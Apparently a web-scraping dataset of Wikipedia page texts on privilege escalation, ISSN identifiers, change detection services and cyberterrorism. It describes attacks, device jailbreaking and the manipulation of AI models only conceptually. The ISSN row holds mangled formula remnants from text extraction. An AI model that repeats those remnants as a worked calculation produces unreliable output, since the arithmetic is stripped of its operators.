39 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Privilege_escalation | Privilege escalation is the act of exploiting a bug, a design flaw, or a configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user. The result is that an application or user with more privileges than intended by the application developer or system administrator can perform unauthorized actions. Most computer systems are designed for use with multiple user accounts, each of which has abilities known as privileges. Common privileges include viewing and editing files or modifying system files. Privilege escalation means users receive privileges they are not entitled to. These privileges can be used to delete files, view private information, or install unwanted programs such as viruses. It usually occurs when a system has a bug that allows security to be bypassed or, alternatively, has flawed design assumptions about how it will be used. Privilege escalation occurs in two forms: This type of privilege escalation occurs when the user or process is able to obtain a higher level of access than an administrator or system developer intended, possibly by performing kernel-level operations. In some cases, a high-privilege application assumes that it would only be provided with input matching its interface specification, thus doesn't validate this input. Then, an attacker may be able to exploit this assumption, in order to run unauthorized code with the application's privileges: In computer security, jailbreaking is defined as the act of removing limitations that a vendor attempted to hard-code into its software or services. 2 A common example is the use of toolsets to break out of a chroot or jail in UNIX-like operating systems 3 or bypassing digital rights management (DRM). In the former case, it allows the user to see files outside of the filesystem that the administrator intends to make available to the application or user in question. In the context of DRM, this allows the user to run arbitrarily defined code on devices with DRM as well as break out of chroot-like restrictions. The term originated with the iPhone iOS jailbreaking community and has also been used as a term for PlayStation Portable hacking; these devices have repeatedly been subject to jailbreaks, allowing the execution of arbitrary code, and sometimes have had those jailbreaks disabled by vendor updates. iOS systems including the iPhone, iPad, and iPod Touch have been subject to iOS jailbreaking efforts since they were released, and continuing with each firmware update. 4 5 iOS jailbreaking tools include the option to install package frontends such as Cydia and Installer.app, third-party alternatives to the App Store, as a way to find and install system tweaks and binaries. To prevent iOS jailbreaking, Apple has made the device boot ROM execute checks for SHSH blobs in order to disallow uploads of custom kernels and prevent software downgrades to earlier, jailbreakable firmware. In an "untethered" jailbreak, the iBoot environment is changed to execute a boot ROM exploit and allow submission of a patched low level bootloader or hack the kernel to submit the jailbroken kernel after the SHSH check. A similar method of jailbreaking exists for S60 Platform smartphones, where utilities such as HelloOX allow the execution of unsigned code and full access to system files. 6 7 or edited firmware (similar to the M33 hacked firmware used for the PlayStation Portable) 8 to circumvent restrictions on unsigned code. Nokia has since issued updates to curb unauthorized jailbreaking, in a manner similar to Apple. In the case of gaming consoles, jailbreaking is often used to execute homebrew games. In 2011, Sony, with assistance from law firm Kilpatrick Stockton, sued 21 year-old George Hotz and associates of the group fail0verflow for jailbreaking the PlayStation 3 (see Sony Computer Entertainment America v. George Hotz and PlayStation Jailbreak). Jailbreaking can also occur in systems and software that use generative artificial intelligence models, such as ChatGPT. In jailbreaking attacks on artificial intelligence systems, users are able to manipulate the model to behave differently than it was programmed, making it possible to reveal information about how the model was instructed and induce it to respond in an anomalous or harmful way. 9 10 Android phones can be officially rooted by either going through manufacturers controlled process, using an exploit to gain root, or flashing custom recovery. Manufacturers allow rooting through a process they control, while some allow the phone to be rooted simply by pressing specific key combinations at boot time, or by other self-administered methods. Using a manufacturers method almost always factory resets the device, making rooting useless to people who want to view the data, and also voids the warranty permanently, even if the device is derooted and reflashed. Software exploits commonly either target a root-level process that is accessible to the user, by using an exploit specific to the phone's kernel, or using a known Android exploit that has been patched in newer versions; by not upgrading the phone, or intentionally downgrading the version. Operating systems and users can use the following strategies to reduce the risk of privilege escalation: Recent research has shown what can effectively provide protection against privilege escalation attacks. These include the proposal of the additional kernel observer (AKO), which specifically prevents attacks focused on OS vulnerabilities. Research shows that AKO is in fact effective against privilege escalation attacks. 13 Horizontal privilege escalation occurs when an application allows the attacker to gain access to resources which normally would have been protected from an application or user. The result is that the application performs actions with the same user but different security context than intended by the application developer or system administrator; this is effectively a limited form of privilege escalation (specifically, the unauthorized assumption of the capability of impersonating other users). Compared to the vertical privilege escalation, horizontal requires no upgrading the privilege of accounts. It often relies on the bugs in the system. 14 This problem often occurs in web applications. Consider the following example: This malicious activity may be possible due to common web application weaknesses or vulnerabilities. Potential web application vulnerabilities or situations that may lead to this condition include: |
40 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/ISSN_(identifier) | An International Standard Serial Number (ISSN) is an eight-digit serial number used to uniquely identify a serial publication (periodical), such as a magazine. 1 The ISSN is especially helpful in distinguishing between serials with the same title. ISSNs are used in ordering, cataloging, interlibrary loans, and other practices in connection with serial literature. 2 The ISSN system was first drafted as an International Organization for Standardization (ISO) international standard in 1971 and published as ISO 3297 in 1975. 3 ISO subcommittee TC 46 SC 9 is responsible for maintaining the standard. When a serial with the same content is published in more than one media type, a different ISSN is assigned to each media type. For example, many serials are published both in print and electronic media. The ISSN system refers to these types as print ISSN (p-ISSN) and electronic ISSN (e-ISSN). 4 Consequently, as defined in ISO 3297:2007, every serial in the ISSN system is also assigned a linking ISSN (ISSN-L), typically the same as the ISSN assigned to the serial in its first published medium, which links together all ISSNs assigned to the serial in every medium. 5 An ISSN is an eight-digit code, divided by a hyphen into two four-digit numbers. 1 The last digit, which may be zero through nine or an X, is a check digit, so the ISSN is uniquely represented by its first seven digits. Formally, the general form of the ISSN (also named "ISSN structure" or "ISSN syntax") can be expressed as follows: 6 where N is in the set 0,1,2,...,9 , a decimal digit character, and C is in 0,1,2,...,9,X ; or by a Perl Compatible Regular Expressions (PCRE) regular expression: For example, the ISSN of the journal Hearing Research, is 0378 5955, where the final 5 is the check digit, that is C 5. To calculate the check digit, the following algorithm may be used: 0 8 3 7 7 6 8 5 5 4 9 3 5 2 0 21 42 40 20 27 10 160 . displaystyle begin aligned 0 cdot 8 3 cdot 7 7 cdot 6 8 cdot 5 5 cdot 4 9 cdot 3 5 cdot 2 0 21 42 40 20 27 10 160 ;. end aligned The remainder of this sum modulo 11 is then calculated: 160 11 14 remainder 6 14 6 11 displaystyle frac 160 11 14 mbox remainder 6 14 frac 6 11 If there is no remainder, the check digit is 0; otherwise the remainder is subtracted from 11. If the result is less than 10, it yields the check digit: 11 6 5 . displaystyle 11 6 5 ;. Thus, in this example, the check digit C is 5. To confirm the check digit, calculate the sum of all eight digits of the ISSN multiplied by their position in the number, counting from the right. (If the check digit is X, add 10 to the sum.) The remainder of the sum modulo 11 must be 0. There is an online ISSN checker that can validate an ISSN, based on the above algorithm. 7 ISSNs can be encoded in EAN 13 bar codes with a 977 "country code" (compare the 978 country code ("bookland") for ISBNs), followed by the 7 main digits of the ISSN (the check digit is not included), followed by 2 publisher-defined digits, followed by the EAN check digit (which need not match the ISSN check digit). 8 ISSN codes are assigned by a network of ISSN National Centres, usually located at national libraries and coordinated by the ISSN International Centre based in Paris. The International Centre is an intergovernmental organization created in 1974 through an agreement between UNESCO and the French government. ISSN-L is a unique identifier for all versions of the serial containing the same content across different media. As defined by ISO 3297:2007, the "linking ISSN (ISSN-L) provides a mechanism for collocation or linking among the different media versions of the same continuing resource. The ISSN-L is one of a serial's existing ISSNs, so does not change the use or assignment of "ordinary" ISSNs; 9 it is based on the ISSN of the first published medium version of the publication. If the print and online versions of the publication are published at the same time, the ISSN of the print version is chosen as the basis of the ISSN-L. With ISSN-L is possible to designate one single ISSN for all those media versions of the title. The use of ISSN-L facilitates search, retrieval and delivery across all media versions for services like OpenURL, library catalogues, search engines or knowledge bases. The International Centre maintains a database of all ISSNs assigned worldwide, the ISDS Register (International Serials Data System), otherwise known as the ISSN Register. At the end of 2016, update the ISSN Register contained records for 1,943,572 items. 10 The Register is not freely available for interrogation on the web, but is available by subscription. ISSN and ISBN codes are similar in concept, where ISBNs are assigned to individual books. An ISBN might be assigned for particular issues of a serial, in addition to the ISSN code for the serial as a whole. An ISSN, unlike the ISBN code, is an anonymous identifier associated with a serial title, containing no information as to the publisher or its location. For this reason a new ISSN is assigned to a serial each time it undergoes a major title change. Since the ISSN applies to an entire serial, other identifiers have been built on top of it to allow references to specific volumes, articles, or other identifiable components (like the table of contents): the Publisher Item Identifier (PII) and the Serial Item and Contribution Identifier (SICI). Separate ISSNs are needed for serials in different media (except reproduction microforms). Thus, the print and electronic media versions of a serial need separate ISSNs, 11 and CD-ROM versions and web versions require different ISSNs. However, the same ISSN can be used for different file formats (e.g. PDF and HTML) of the same online serial. This "media-oriented identification" of serials made sense in the 1970s. In the 1990s and onward, with personal computers, better screens, and the Web, it makes sense to consider only content, independent of media. This "content-oriented identification" of serials was a repressed demand during a decade, but no ISSN update or initiative occurred. A natural extension for ISSN, the unique-identification of the articles in the serials, was the main demand application. An alternative serials' contents model arrived with the indecs Content Model and its application, the digital object identifier (DOI), an ISSN-independent initiative, consolidated in the 2000s. Only later, in 2007, ISSN-L was defined in the new ISSN standard (ISO 3297:2007) as an "ISSN designated by the ISSN Network to enable collocation or versions of a continuing resource linking among the different media". 12 An ISSN can be encoded as a uniform resource name (URN) by prefixing it with "urn:ISSN: . 6 For example, Rail could be referred to as "urn:ISSN:0953 4563". URN namespaces are case-sensitive, and the ISSN namespace is all caps. 13 If the checksum digit is "X" then it is always encoded in uppercase in a URN. The URNs are content-oriented, but ISSN is media-oriented: A unique URN for serials simplifies the search, recovery and delivery of data for various services including, in particular, search systems and knowledge databases. 12 ISSN-L (see Linking ISSN above) was created to fill this gap. The two standard categories of media in which serials are most available are print and electronic. In metadata contexts (e.g., JATS), these may have standard labels. p-ISSN is a standard label for "Print ISSN", the ISSN for the print media (paper) version of a serial. Usually it is the "default media" and so the "default ISSN". e-ISSN (or eISSN) is a standard label for "Electronic ISSN", the ISSN for the electronic media (online) version of a serial. 15 |
41 | https://en.wikipedia.org/wiki/Web_scraping | https://www.worldcat.org/issn/0148-2963 | We’re sorry, but WorldCat does not work without JavaScript enabled. Please enable JavaScript on your browser. WorldCat is the world’s largest library catalog, helping you find library materials online. |
42 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Change_detection_and_notification | Change detection and notification (CDN) is the automatic detection of changes made to World Wide Web pages and notification to interested users by email or other means. 1 Whereas search engines are designed to find web pages, CDN systems are designed to monitor changes to web pages. Before change detection and notification, it was necessary for users to manually check for web page changes, either by revisiting web sites or periodically searching again. Efficient and effective change detection and notification is hampered by the fact that most servers do not accurately track content changes through Last-Modified or ETag web-server headers. In 2019 a comprehensive analysis regarding CDN systems was published. In 1996, NetMind developed the first change detection and notification tool, known as Mind-it, which ran for six years. This spawned new services such as ChangeDetection (1999), ChangeDetect (2002), Google Alerts (2003), and Versionista (2007) which was used by the John McCain 2008 presidential campaign in the race for the 2008 United States presidential election. 2 Historically, change polling has been done either by a server which sent email notifications or a desktop program which audibly alerted the user to a change. Change alerting is also possible directly to mobile devices and through push notifications, webhooks and HTTP callbacks for application integration. Monitoring options vary by service or product and range from monitoring a single web page at a time to entire web sites. What is actually monitored also varies by service or product with the possibilities of monitoring text, links, documents, scripts, images or screen shots. With the notable exception of Google's patent filings related to Google Alerts, intellectual property activity by change detection and notification vendors is minimal. 3 No one vendor has successfully leveraged exclusive rights to change detection and notification technology through patents or other legal means. citation needed This has resulted in significant functional overlap between products and services. Change detection and notification services can be categorized by the software architecture they use. Three principal approaches can be distinguished: A server polls content, tracks changes and logs data, sending alerts in the form of email notifications, webhooks, RSS. Typically, an associated website with a configuration is managed by the user. Some services also have a mobile device application which connects to a cloud server and provides alerts to the mobile device. A relatively newer approach, which lays between server-based and client-based is to use self-hosting, where the software which would normally run on a separate server runs on your own hardware locally, generally means that the software provides a miniature web server with a browser interface instead of a classic graphical user interface provided by an application. A local client application with a graphical user interface polls content, tracks changes and logs data. Client applications can be browser extensions, mobile apps or programs. Some web pages change regularly, due to the inclusion of adverts or feeds in the presented page. This can trigger false-positives in the change-detection, since users are often only interested in changes to the main content. Some approaches to mitigate this issue exist. |
43 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Cyberterrorism | Cyberterrorism is the use of the Internet to conduct violent acts that result in, or threaten, the loss of life or significant bodily harm, in order to achieve political or ideological gains through threat or intimidation. Emerging alongside the development of information technology, 1 cyberterrorism involves acts of deliberate, large-scale disruption of computer networks, especially of personal computers attached to the Internet by means of tools such as computer viruses, computer worms, phishing, malicious software, hardware methods, and programming scripts can all be forms of internet terrorism. 2 Some authors opt for a very narrow definition of cyberterrorism, relating to deployment by known terrorist organizations of disruption attacks against information systems for the primary purpose of creating alarm, panic, or physical disruption. Other authors prefer a broader definition, which includes cybercrime. Participating in a cyberattack affects the terror threat perception, even if it isn't done with a violent approach. 3 By some definitions, it might be difficult to distinguish which instances of online activities are cyberterrorism or cybercrime. 4 Cyberterrorism can be also defined as the intentional use of computers, networks, and public internet to cause destruction and harm for personal objectives. Experienced cyberterrorists, who are very skilled in terms of hacking can cause massive damage to government systems and might leave a country in fear of further attacks. 5 The objectives of such terrorists may be political or ideological since this can be considered a form of terror. 6 There is much concern from government and media sources about potential damage that could be caused by cyberterrorism, and this has prompted efforts by government agencies such as the Federal Bureau of Investigation (FBI), National Security Agency (NSA), and the Central Intelligence Agency (CIA) to put an end to cyber attacks and cyberterrorism. 5 There have been several major and minor instances of cyberterrorism. Al-Qaeda utilized the internet to communicate with supporters and even to recruit new members. 7 Estonia, a Baltic country which is constantly evolving in terms of technology, became a battleground for cyberterrorism in April 2007 after disputes regarding the relocation of a WWII soviet statue located in Estonia's capital Tallinn. 4 There is debate over the basic definition of the scope of cyberterrorism. These definitions can be narrow such as the use of Internet to attack other systems in the Internet that result to violence against persons or property. 8 They can also be broad, those that include any form of Internet usage by terrorists to conventional attacks on information technology infrastructures. 8 There is variation in qualification by motivation, targets, methods, and centrality of computer use in the act. U.S. government agencies also use varying definitions and that none of these have so far attempted to introduce a standard that is binding outside of their sphere of influence. 9 Depending on context, cyberterrorism may overlap considerably with cybercrime, cyberwar or ordinary terrorism. 10 Eugene Kaspersky, founder of Kaspersky Lab, now feels that "cyberterrorism" is a more accurate term than "cyberwar". He states that "with today's attacks, you are clueless about who did it or when they will strike again. It's not cyber-war, but cyberterrorism. 11 He also equates large-scale cyber weapons, such as the Flame Virus and NetTraveler Virus which his company discovered, to biological weapons, claiming that in an interconnected world, they have the potential to be equally destructive. 11 12 If cyberterrorism is treated similarly to traditional terrorism, then it only includes attacks that threaten property or lives, and can be defined as the leveraging of a target's computers and information, particularly via the Internet, to cause physical, real-world harm or severe disruption of infrastructure. Many academics and researchers who specialize in terrorism studies suggest that cyberterrorism does not exist and is really a matter of hacking or information warfare. 13 They disagree with labeling it as terrorism because of the unlikelihood of the creation of fear, significant physical harm, or death in a population using electronic means, considering current attack and protective technologies. If death or physical damage that could cause human harm is considered a necessary part of the cyberterrorism definition, then there have been few identifiable incidents of cyberterrorism, although there has been much policy research and public concern. Modern terrorism and political violence is not easily defined, however, and some scholars assert that it is now "unbounded" and not exclusively concerned with physical damage. 14 There is an old saying that death or loss of property are the side products of terrorism, the main purpose of such incidents is to create terror in peoples' minds and harm bystanders. If any incident in cyberspace can create terror, it may be rightly called cyberterrorism. For those affected by such acts, the fears of cyberterrorism are quite real. 15 As with cybercrime in general, the threshold of required knowledge and skills to perpetrate acts of cyberterrorism has been steadily diminishing thanks to freely available hacking suites and online courses. 16 Additionally, the physical and virtual worlds are merging at an accelerated rate, making for many more targets of opportunity which is evidenced by such notable cyber attacks as Stuxnet, the Saudi petrochemical sabotage attempt in 2018 and others. 17 Assigning a concrete definition to cyberterrorism can be hard, due to the difficulty of defining the term terrorism itself. Multiple organizations have created their own definitions, most of which are overly quantify broad. There is also controversy concerning overuse of the term, hyperbole in the media and by security vendors trying to sell "solutions". 18 One way of understanding cyberterrorism involves the idea that terrorists could cause massive loss of life, worldwide economic chaos and environmental damage by hacking into critical infrastructure systems. 19 The nature of cyberterrorism covers conduct involving computer or Internet technology that: 20 The term "cyberterrorism" can be used in a variety of different ways, but there are limits to its use. An attack on an Internet business can be labeled cyberterrorism, however when it is done for economic motivations rather than ideological it is typically regarded as cybercrime. 20 Convention also limits the label "cyberterrorism" to actions by individuals, independent groups, or organizations. Any form of cyberwarfare conducted by governments and states would be regulated and punishable under international law. 20 The Technolytics Institute defines cyberterrorism as t he premeditated use of disruptive activities, or the threat thereof, against computers and or networks, with the intention to cause harm or further social, ideological, religious, political or similar objectives. Or to intimidate any person in furtherance of such objectives. 21 The term appears first in defense literature, surfacing (as "cyber-terrorism") in reports by the U.S. Army War College as early as 1998. 22 The National Conference of State Legislatures, an organization of legislators created to help policymakers in the United States with issues such as economy and homeland security defines cyberterrorism as: T he use of information technology by terrorist groups and individuals to further their agenda. This can include use of information technology to organize and execute attacks against networks, computer systems and telecommunications infrastructures, or for exchanging information or making threats electronically. Examples are hacking into computer systems, introducing viruses to vulnerable networks, web site defacing, Denial-of-service attacks, or terroristic threats made via electronic communication. 23 The American Federal Emergency Management agency defines cyberterrorism as: T he illegal threat and the attack against computers, networks, and information stored, where it is carried out to frighten and force the government or its people ti achieve political or social objectives. 24 NATO defines cyberterrorism as a cyberattack using or exploiting computer or communication networks to cause sufficient destruction or disruption to generate fear or to intimidate a society into an ideological goal". 25 The United States National Infrastructure Protection Center defined cyberterrorism as: A criminal act perpetrated by the use of computers and telecommunications capabilities resulting in violence, destruction, and or disruption of services to create fear by causing confusion and uncertainty within a given population, with the goal of influencing a government or population to conform to a political, social, or ideological agenda. 26 The FBI, another United States agency, defines "cyber terrorism" as "premeditated, politically motivated attack against information, computer systems, computer programs, and data which results in violence against non-combatant targets by subnational groups or clandestine agents". 27 These definitions tend to share the view of cyberterrorism as politically and or ideologically inclined. One area of debate is the difference between cyberterrorism and hacktivism. Hacktivism is "the marriage of hacking with political activism". 28 Both actions are politically driven and involve using computers, however cyberterrorism is primarily used to cause harm. It becomes an issue because acts of violence on the computer can be labeled by whom? either citation needed cyberterrorism or hacktivism. In 1999 the Center for the Study of Terrorism and Irregular Warfare at the Naval Postgraduate School in Monterey, California, defined three levels of cyberterror capability: 29 Cyberterrorism is becoming more and more prominent on social media today. 30 need quotation to verify As the Internet becomes more pervasive, individuals or groups can use the anonymity afforded by cyberspace to threaten other individuals, specific groups (with membership based, for example, on ethnicity or belief), communities and entire countries, without the inherent threat of identification, capture, injury, or death of the attacker that being physically present would bring. Many quantify groups such as Anonymous, use tools such as denial-of-service attacks to attack and censor groups which oppose them, creating many concerns for freedom and respect for differences of thought. Many believe that cyberterrorism is an extreme threat to countries' economies, citation needed and fear an attack could potentially lead to another Great Depression. citation needed Several leaders agree that cyberterrorism has the highest percentage of threat over other possible attacks on U.S. territory. Although natural disasters are considered by whom? a top threat and have proven to be devastating to people and land, there is ultimately little that can be done to prevent such events from happening. Thus, the expectation is to focus more on preventative measures that will make Internet attacks impossible for execution. citation needed As the Internet continues to expand, and computer systems continue to be assigned increased responsibility while becoming more complex and interdependent, sabotage or terrorism via the Internet may become a more serious threat and is possibly one of the top 10 events to "end the human race. 31 better source needed People have much easier access to illegal involvement within cyberspace by the ability to access a part of the internet known as the Dark Web. 32 (registration required) The Internet of Things promises to further merge the virtual and physical worlds, which some quantify experts which? see as a powerful incentive for states to use terrorist proxies in furtherance of objectives. 33 Dependence on the Internet is rapidly increasing on a worldwide scale, creating a platform for international cyber-terror plots to be formulated and executed as a direct threat to national security. 20 need quotation to verify For terrorists, cyber-based attacks have distinct advantages over physical attacks. They can be conducted remotely, anonymously, and relatively cheaply, and they do not require significant investment in weapons, explosives or personnel. 34 The effects can be widespread and profound. Incidents of cyberterrorism are likely to increase. They can be expected to take place through denial-of-service attacks, malware, and other methods that are difficult to envision today. 35 need quotation to verify One example involves the deaths involving the Islamic State and the online social networks Twitter, Google, and Facebook leading to legal action being taken against them, that ultimately resulted in them being sued. 36 need quotation to verify In an article about cyber attacks by Iran and North Korea, The New York Times observes: The appeal of digital weapons is similar to that of nuclear capability: it is a way for an outgunned, outfinanced nation to even the playing field. "These countries are pursuing cyberweapons the same way they are pursuing nuclear weapons, said James A. Lewis, a computer security expert at the Center for Strategic and International Studies in Washington. "It's primitive; it's not top of the line, but it's good enough and they are committed to getting it. 37 In addition, Cyberterrorism has also been documented to arouse negative emotions. Recent studies have suggested that Cyberterrorism produces heightened levels of anger and stress, which do not differ drastically from the effects of conventional terrorism. 38 Researchers also noted that Cyberterrorism produced higher levels of stress than anger, and the responses are not dependent on the lethality of the attack. 38 Public interest in cyberterrorism began in the late 1990s, when the term was coined by Barry C. Collin. 39 As 2000 approached, the fear and uncertainty about the millennium bug heightened, as did the potential for attacks by cyber terrorists. Although the millennium bug was by no means a terrorist attack or plot against the world or the United States, it did act as a catalyst in sparking the fears of a possibly large-scale devastating cyber-attack. Commentators noted that many of the facts of such incidents seemed to change, often with exaggerated media reports. The high-profile terrorist attacks in the United States on 11 September 2001, and the ensuing War on Terror by the US led to further media coverage of the potential threats of cyberterrorism in the years following. Mainstream media coverage often discusses the possibility of a large attack making use of computer networks to sabotage critical infrastructures with the aim of putting human lives in jeopardy or causing disruption on a national scale either directly or by disruption of the national economy. 40 Authors such as Winn Schwartau and John Arquilla are reported to have had considerable financial success selling books which described what were purported to be plausible scenarios of mayhem caused by cyberterrorism. Many critics claim that these books were unrealistic in their assessments of whether the attacks described (such as nuclear meltdowns and chemical plant explosions) were possible. A common thread throughout what critics perceive as cyberterror-hype is that of non-falsifiability; that is, when the predicted disasters fail to occur, it only goes to show how lucky we've been so far, rather than impugning the theory. In 2016, for the first time ever, the Department of Justice charged Ardit Ferizi with cyberterrorism. He is accused of allegedly hacking into a military website and stealing the names, addresses, and other personal information of government and military personnel and selling it to ISIS. 41 On the other hand, it is also argued that, despite substantial studies on cyberterrorism, the body of literature is still unable to present a realistic estimate of the actual threat. 42 For instance, in the case of a cyberterrorist attack on a public infrastructure such as a power plant or air traffic control through hacking, there is uncertainty as to its success because data concerning such phenomena are limited. 42 Cyberterrorism ranks among the highest potential security threats in the world. It has become more critical than the development of nuclear weapons or the current conflicts between nations. Due to the pervasiveness of the internet and the amount of responsibility assigned to this technology, digital weapons pose a threat to entire economic or social systems. Some of the most critical international security concerns include: DDoS Attacks Millions of Denial of Service attacks occur every year and the service disruption can cost hundreds of thousands of dollars each hour they are down. It is important to keep critical systems secured and redundant to remain online during these attacks. Social Engineering In 1997 an experiment conducted by the NSA concluded that thirty five-hackers were able to access critical pentagon computer systems and could easily edit accounts, reformat data and even shut down entire systems. Often they used phishing tactics such as calling offices and pretending to be technicians to gain passwords. Third Party Software The top retailers are connected with thousands of separate third-party recourses and at least 23% of those assets have at least one critical vulnerability. These companies need to manage and reevaluate their network security in order to keep personal data safe. As technology becomes more and more integrated into society, new vulnerabilities and security threats are opened up on these complex networks that we have set up. If an intruder was to gain access to these networks they have the potential to threaten entire communities or economic systems. There is no certainty for what events will take place in the future, which is why it is important that there are systems build to adapt to the changing environment. The most apparent cyberterrorism threat in our near future will involve the state of remote work during the COVID 19 pandemic. Companies cannot expect that every home office is up to date and secure so they must adopt a zero-trust policy from home devices. This means that they must assume corporate resources and unsecured devices are sharing the same space and they must act accordingly. The rise of cryptocurrency has also sparked some additional threats in the realm of security. Cyber Criminals are now hijacking home computers and company networks in order to mine certain cryptocurrencies such as bitcoin. This mining process requires an immense amount of computer processing power which can cripple a business’ network and lead to severe downtime if the issue is not resolved. As of 2016 there have been eighteen conventions and major legal instruments that specifically deal with terrorist activities and cyber terrorism. There are many different motives for cyberattacks, with the majority being for financial reasons. However, there is increasing evidence that hackers are becoming more politically motivated. Cyberterrorists are aware that governments are reliant on the internet and have exploited this as a result. For example, Mohammad Bin Ahmad As-S lim's piece "39 Ways to Serve and Participate in Jihad" discusses how an electronic jihad could disrupt the West through targeted hacks of American websites, and other resources seen as anti-Jihad, modernist, or secular in orientation (Denning, 2010; Leyden, 2007). 44 Many of the cyberattacks are not conducted for money, rather the cyberattacks are conducted due to different ideological beliefs and due to wanting to get personal revenge and outrage towards company or individual, the cybercriminal is attacking. 45 An employee might want to get revenge on a company if they were mistreated or wrongfully terminated. citation needed Other motivations for cybercriminals include: Political goals motivate cyber-attackers because they are not happy with candidates and they might want certain candidates to win the election, therefore, they might alter the election voting to help their preferred candidate win. Competition between two companies can also stir up a cyberattack, as one company can hire a hacker to conduct the attack on a company as they might want to test the rival company's security. This will also benefit a company because it will force their competitor's customers to think that the company is not secure due to them getting cyber attacked effortlessly and they don't want any of their personal credentials getting leaked. Cyberwarfare is motivation for countries that are fighting each other. This is mainly used to weaken the opposing country by compromising its core systems and the countries data and other vulnerable information. Money is motivating for cyber attacks for ransomware, phishing, and data theft as the cyber criminals can differently contact the victims and ask for money and in return the data stays safe. 46 The United Nations has several agencies that seek to address in cyberterrorism, including, the United Nations Office of Counter-Terrorism, the United Nations Office on Drugs and Crime, the United Nations Office for Disarmament Affairs, the United Nations Institute for Disarmament Research, the United Nations Interregional Crime and Justice Research Institute, and the International Telecommunication Union. Both EUROPOL and INTERPOL also notably specialize on the subject. Both Europol and Interpol specialize in operations against cyberterrorism as they both collaborate on different operations together and host a yearly joint cybercrime conference. While they both fight against cybercrime, both institutions operate differently. Europol sets up and coordinates cross-border operations against cybercriminals in the EU, while Interpol helps law enforcement and coordinates operations against cyber criminals globally. 47 The Baltic state of Estonia was the target of a massive denial-of-service attack that ultimately rendered the country offline and shut out from services dependent on Internet connectivity in April 2007. The infrastructure of Estonia including everything from online banking and mobile phone networks to government services and access to health care information was disabled for a time. The tech-dependent state experienced severe turmoil and there was a great deal of concern over the nature and intent of the attack. The cyber attack was a result of an Estonian-Russian dispute over the removal of a bronze statue depicting a World War II-era Soviet soldier from the center of the capital, Tallinn. 4 In the midst of the armed conflict with Russia, Georgia likewise was subject to sustained and coordinated attacks on its electronic infrastructure in August 2008. In both of these cases, circumstantial evidence point to coordinated Russian attacks, but attribution of the attacks is difficult; though both the countries blame Moscow for contributing to the cyber attacks, proof establishing legal culpability is lacking. Estonia joined NATO in 2004, which prompted NATO to carefully monitor its member states' response to the attack. NATO also feared escalation and the possibility of cascading effects beyond Estonia's border to other NATO members. In 2008, directly as a result of the attacks, NATO opened a new center of excellence on cyberdefense to conduct research and training on cyber warfare in Tallinn. 48 The chaos resulting from the attacks in Estonia illustrated to the world the dependence countries had on information technology. This dependence then makes countries vulnerable to future cyber attacks and terrorism. 4 Quick information on the cyber attack on Estonia and its effects on the country. 49 As cyberattacks continue to increase around the world, countries still look at the attacks on Estonia in the 2007 as an example of how countries can fight future cyberattacks and terrorism. As a result of the attacks, Estonia is now currently one of the top countries in cyber defence and online safety and its capital city of Tallinn is home to NATO's cyber defense hub. The government of Estonia continues to update there cyber defence protocols and national cybersecurity strategies. NATO's Cooperative Cyber Defence Centre in Tallinn also conducts research and training on cyber security to not just help Estonia but other countries that are in the alliance. 50 The Chinese Defense Ministry confirmed the existence of an online defense unit in May 2011. Composed of about thirty elite internet specialists, the so-called "Cyber Blue Team", or "Blue Army", is officially claimed to be engaged in cyber-defense operations, though there are fears the unit has been used to penetrate secure online systems of foreign governments. 51 52 China's leaders have invested in its foundations of cyber defense and quantum computing and artificial intelligence. 39 Chinese soldiers were chosen to strengthen China's cyber defenses. The reason given by Spokesman for the Ministry of National Defense, Geng Yansheng was that their internet protection was currently weak. Geng claimed that the program was only temporary to help improve cyber defenses. 53 To counter the cyber terrorists, also called "white-collar jihadis", the police in India has registered private citizens as volunteers who patrol the internet and report the suspected cyber terrorists to the government. These volunteers are categorised in three categories, namely "Unlawful Content Flaggers", "Cyber Awareness Promoters" and "Cyber Experts". In August 2021, police arrested five suspected white-collar jihadis who were preparing a hit list of officers, journalists, social activists, lawyers and political functionaries to create fear among people. The white-collar jihadis are considered "worst kind of terrorists" as they remain anonymous and safe in other nations, but inflict "immeasurable" amount of damage and brainwashing. 54 In India, the demand for cyber security professionals has increased over 100 per cent in 2021 and will rise 200 per cent by 2024. 55 Eighty two percent of companies in India had a ransomware attack in the year 2020. The cost it takes to recover from a ransomware attack in India has gone from $1.1 million in 2020 to $3.38 million in 2021. 56 India is at the top of the list of 30 countries for ransomware attacks. A cyber-attack took place on the electricity grid in Maharashtra that resulted in a power outage. This occurred in October 2020 and the authorities believe China was behind it. 57 Important information like dates of birth and full names were leaked for thousands of patients who were tested for COVID 19. This information was made accessible on Google and was leaked from government websites. The job portal IIMjobs was attacked and the information of 1.4 million people looking for jobs was leaked. The information leaked was quite extensive including the location of users and their names and phone numbers. The information for 500,000 Indian police personal was sold on a forum in February 2021. The information contained much personal information. The data was from a police exam taken in December 2019. 58 According to 2016 Deloitte Asia-Pacific Defense Outlook, 59 South Korea's 'Cyber Risk Score' was 884 out of 1,000 and South Korea is found to be the most vulnerable country to cyber attacks in the Asia-Pacific region. Considering South Korea's high speed internet and cutting-edge technology, its cyber security infrastructure is relatively weak. 60 The 2013 South Korea cyberattack significantly damaged the Korean economy. This attack wounded the systems of two banks and the computer networks of three TV broadcasters. The incident was a massive blow, and the attacker was never identified. It was theorized to be North Korea. The week before North Korea accused the United States and South Korea of shutting down their internet for two days. 61 In 2017, a ransomware attack harassed private companies and users, who experienced personal information leakage. Additionally, there were North Korea's cyber attacks which risked national security of South Korea. 62 In response to this, South Korean government's countermeasure is to protect the information security centres the National Intelligence Agency. Currently, 'cyber security' is one of the major goals of NIS Korea. 63 Since 2013, South Korea had established policies related to National cyber security and trying to prevent cyber crises via sophisticated investigation on potential threats. Meanwhile, scholars emphasize on improving the national consciousness towards cyber attacks as South Korea had already entered the so-called 'hyper connected society'. North Korea's cyberwarfare is incredibly efficient and the best of state-sponsored hackers. Those who are chosen to be hackers are selected when they are young and trained specifically in cyberwarfare. Hackers are trained to steal money from ATMs but not enough to be reported. North Korea is great at zero-day exploits. The country will hack anyone they chose to. They steal secrets from companies and government agencies and steal money from financial systems to fund their hacking operations. 64 Pakistani Government has also taken steps to curb the menace of cyberterrorism and extremist propaganda. National Counter Terrorism Authority (Nacta) is working on joint programs with different NGOs and other cyber security organizations in Pakistan to combat this problem. 